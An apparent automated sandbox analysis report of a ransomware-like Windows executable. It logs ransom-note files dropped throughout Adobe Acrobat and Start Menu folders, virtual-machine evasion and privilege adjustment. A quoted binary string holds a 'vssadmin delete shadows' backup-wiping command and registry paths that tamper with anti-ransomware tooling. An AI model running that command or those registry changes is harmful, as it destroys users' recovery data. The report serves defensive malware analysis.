Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fr-ma\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\hr-hr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\hu-hu\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\it-it\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ja-jp\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ko-kr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\nb-no\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\nl-nl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\pl-pl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\pt-br\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ro-ro\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\root\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ru-ru\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sk-sk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sl-si\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sv-se\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\tr-tr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\uk-ua\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\zh-cn\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\zh-tw\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\css\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\js\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\css\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\images\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\ca-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\cs-cz\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\da-dk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\de-de\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\en-ae\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\en-il\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\es-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\eu-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\fi-fi\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\fr-fr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\fr-ma\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\hr-hr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\hu-hu\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\it-it\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\ja-jp\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\ko-kr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\nb-no\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\nl-nl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\pl-pl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\pt-br\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\ro-ro\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\root\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\ru-ru\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\sk-sk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\sl-si\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\sv-se\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\tr-tr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\uk-ua\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-cn\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-tw\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\css\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\images\themes\dark\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\images\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ca-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\cs-cz\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\da-dk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\de-de\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-ae\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-gb\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-il\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\es-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\eu-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fi-fi\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fr-fr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fr-ma\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\hr-hr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\hu-hu\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\it-it\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ja-jp\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ko-kr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\nb-no\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\nl-nl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\pl-pl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\pt-br\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ro-ro\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\root\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ru-ru\RECOVERY INFO.txt	Jump to behavior

Source: 2b7cu0KwZl.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: 2b7cu0KwZl.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 2b7cu0KwZl.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 2b7cu0KwZl.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 2b7cu0KwZl.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 2b7cu0KwZl.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 2b7cu0KwZl.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 2b7cu0KwZl.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: 2b7cu0KwZl.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: 2b7cu0KwZl.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 2b7cu0KwZl.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 2b7cu0KwZl.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 2b7cu0KwZl.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 2b7cu0KwZl.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Persistence and Installation Behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	System file written: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe			Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	System file written: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe			Jump to behavior

Source: 2b7cu0KwZl.exe

Binary or memory string: SeTakeOwnershipPrivilegeSeDebugPrivilegePowrProf.dllPowerSetActiveScheme\sysnative\vssadmin.exe delete shadows /all /quietopenSOFTWARE\RaccineSYSTEM\CurrentControlSet\Services\EventLog\Application\RaccineSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vssadmin.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmic.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wbadmin.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bcdedit.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\diskshadow.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exep

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\Start Menu\Programs\7-Zip\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\Start Menu\Programs\Accessibility\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\Start Menu\Programs\Accessories\System Tools\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\Start Menu\Programs\Accessories\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\Start Menu\Programs\Administrative Tools\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\Start Menu\Programs\AutoIt v3\Extras\AutoItX\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\Start Menu\Programs\AutoIt v3\Extras\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\Start Menu\Programs\AutoIt v3\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\Start Menu\Programs\Java\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\Start Menu\Programs\Microsoft Office Tools\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\Start Menu\Programs\System Tools\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\Start Menu\Programs\Windows PowerShell\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\Start Menu\Programs\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\Default\Start Menu\Programs\Accessibility\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\Default\Start Menu\Programs\System Tools\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\Default\Start Menu\Programs\Windows PowerShell\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\user\Start Menu\Programs\Accessibility\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\user\Start Menu\Programs\Accessories\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\user\Start Menu\Programs\System Tools\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\user\Start Menu\Programs\Windows PowerShell\RECOVERY INFO.txt	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe TID: 2520	Thread sleep time: -30000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe TID: 396	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File opened: C:\Documents and Settings\user\Local Settings\Adobe\Acrobat\DC\Cache\	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File opened: C:\Documents and Settings\user\Local Settings\Adobe\	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File opened: C:\Documents and Settings\user\Local Settings\	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File opened: C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10042023-093411-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File opened: C:\Documents and Settings\user\Local Settings\Adobe\Acrobat\	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File opened: C:\Documents and Settings\user\Local Settings\Adobe\Acrobat\DC\	Jump to behavior

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
